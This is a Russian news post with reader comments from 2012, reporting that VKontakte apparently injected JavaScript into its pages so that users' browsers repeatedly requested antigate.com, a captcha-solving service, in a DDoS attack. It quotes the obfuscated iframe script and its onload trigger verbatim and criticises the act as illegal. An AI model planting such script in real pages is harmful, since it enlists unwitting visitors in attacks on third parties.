ВКонтакте провели DDOS атаку
0
ВКонтакте провели DDOS атаку

Социальная сеть «ВКонтакте» внедрила на все страницы сайта сценарий, осуществляющий DDoS атаку на сайт antigate.com.
Сегодня многие пользователи ВБотнете, посетившие сайт социальной сети, могли стать невольными участниками DDoS атаки на сайт antigate.com.


PS: Antigate - сервис для автоматического распознавания капчи, ей в частности пользуются многие ботоводы и другие люди занимающейся спамом к примеру...

На страницах пользователей загружался следующий javascript сценарий:
function _test() {
var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();
d.write(' <script>this.location="http://ant'+'iga'+'te.com/i '+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+ 'g=o'+'n";</sc'+'ript>');
setTimeout(re.pbind(fr),1000);
}
<body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()">


Этот сценарий отправлял запрос на сайт antigate.com из браузера каждого пользователя соцсети «ВКонтакте» при каждой загрузке страницы.

Скрипт создаёт iframe и подгружает страницу http://****.com/in.php?first_and_last_warning=on (что-бы избежать Хабраэффекта, ссылка убрана).
Из адреса видно: "первое и последнее предупреждение".

Такие действия уже наблюдались со стороны ВКонтакте во время Премии Рунета: ВКонтакте против «Премии рунета»

UPD1: ВКонтакте убрал iframe, после того как Антигейт сделал редирект на xvideos
UPD2: ВКонтакте поставили xmlhttprequest, но через некоторое время убрали.

Подобные действия со стороны администрации «ВКонтакте» не могут радовать, и невольно поднимается вопрос о моральности и законности (ст. 274 УК РФ) подобных действий.

Пресс-служба «ВКонтаке» пока никак не прокомментировала это событие.
http://www.securitylab.ru/news/423743.php

pps: ну вот и началось, теперь все понятно, вконтакте изначально создавался как ботнэт из обычных пользователей и теперь они будут ддосом заниматься.

http://habrahabr.ru/post/142836/


Внимание! Данная статья была написана более полугода назад, актуальность материала и состояние жизни ссылок не гарантируется! Воспользуйтесь дополнительными параметрами для поиска необходимого вам контента! Приносим свои извинения...
Russian Federation  Комментарий #1, добавлен: 28 апреля 2012, 11:06 [2] [Q] [#]
0
а как же обновления, неужто уже ничего нового не придумают, теперь взялись за другие дела:)

Russian Federation  Комментарий от Автора #2, добавлен: 30 апреля 2012, 11:46 [2] [Q] [#]
0
Сейчас они удалили этот скрипт, заголовок остался только _test()

«ВКонтакте» использовала миллионы пользователей для DDoS-атаки

Крупнейшая социальная сеть в СНГ «ВКонтакте» на протяжении нескольких часов использовала миллионы своих активных пользователей без их согласия для DDoS-атаки на сайт «Antigate.com».

Посмотрев исходный код любой страницы «ВКонтакте», можно было заметить там интересные строки Java-скрипта, который производил обращения к стороннему сайту в отдельно создаваемом Iframe_блоке, передавая при этом параметр «in.php?first_and_last_warning=on», что дословно означает — «Первое и последнее предупреждение». Таким образом, социальная сеть направила неимоверную волну трафика на ресурс «Antigate.com».
Не многие знают, что этот сервис позволяет распознавать капчу (captcha) — изображение с искаженным текстом, используемое, в основном, в целях борьбы с ботами и для предотвращения возможности массового подбора пароля к чему-либо. «Antigate» — это наиболее известный инструмент в спаммерских кругах. Его используют для рассылки сообщений в наиболее известных социальных сервисах, среди которых особой популярностью пользуется «ВКонтакте».

Стоит отметить, что подобные действия со стороны «ВКонтакте» незаконны и попадают сразу под несколько статей УК РФ — 273 и 274. Социальная сеть использовала пользователей без их собственного ведома в преступных целях, вовлекая при этом и малолетних детей.

Администрация сети пока никак не прокомментировала данную ситуацию, напрямую связанную с уголовной ответственностью. Но эксперты в области компьютерной безопасности пока рекомендуют всем пользователям воздержаться от посещения соцсети до разрешения сложившихся обстоятельств.

Оставить комментарий / Добавление ссылок в комментариях разрешено